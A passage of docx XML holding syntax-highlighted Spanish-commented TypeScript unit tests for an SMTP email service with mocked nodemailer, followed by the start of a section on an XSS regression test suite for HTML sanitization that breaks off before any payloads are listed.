        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">importActual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">typeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'nodemailer'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'nodemailer'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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">actual</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      createTransport</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mockReturnValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        sendMail</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mockResolvedValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;test-msg-id&gt;'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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'SmtpService'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mockAccount </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    _id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> () </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'acc-1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">any</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'user@example.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    smtpHost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'smtp.example.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    smtpPort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">587</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    smtpSecure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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Test User'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    credentialsEncrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'cipher'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    credentialsIv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'iv123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    credentialsTag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'tag123'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    get</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">unknown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> AccountDoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">beforeEach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">clearAllMocks</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'crea transporter con configuración correcta'</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SmtpService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Mock decryptCredentials para retornar JSON de credenciales</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">spyOn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'decryptCredentials'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mockReturnValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{"password":"secret"}'</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service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getTransporter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(mockAccount)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(nodemailer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createTransport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toHaveBeenCalledWith</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">objectContaining</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        pool</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host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'smtp.example.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">587</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        secure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maxConnections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maxMessages</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'envía email y retorna messageId'</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SmtpService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    vi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">spyOn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(AuthService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'decryptCredentials'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mockReturnValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{"password":"secret"}'</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msgId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sendEmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(mockAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'recipient@example.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Test Subject'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Plain text body'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;p&gt;HTML body&lt;/p&gt;'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expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(msgId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;test-msg-id&gt;'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02"/>
    <w:bookmarkStart w:id="203" w:name="X6c8d18e0608a011c353041d10f8fc23ca80420f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.1.3 Sanitización: Regresión XSS con Payloads Conocidos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sanitización HTML es la línea de defensa crítica contra ataques XSS vía correo electrónico. Dado el historial de vulnerabilidades en DOMPurify, incluyendo CVE-2025-15599</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[281]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[282]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se mantiene una suite de regresión con payloads conocidos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/__tests__/sanitize.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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sanitizeHtml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'sanitize-html'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Payloads de ataque XSS conocidos</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
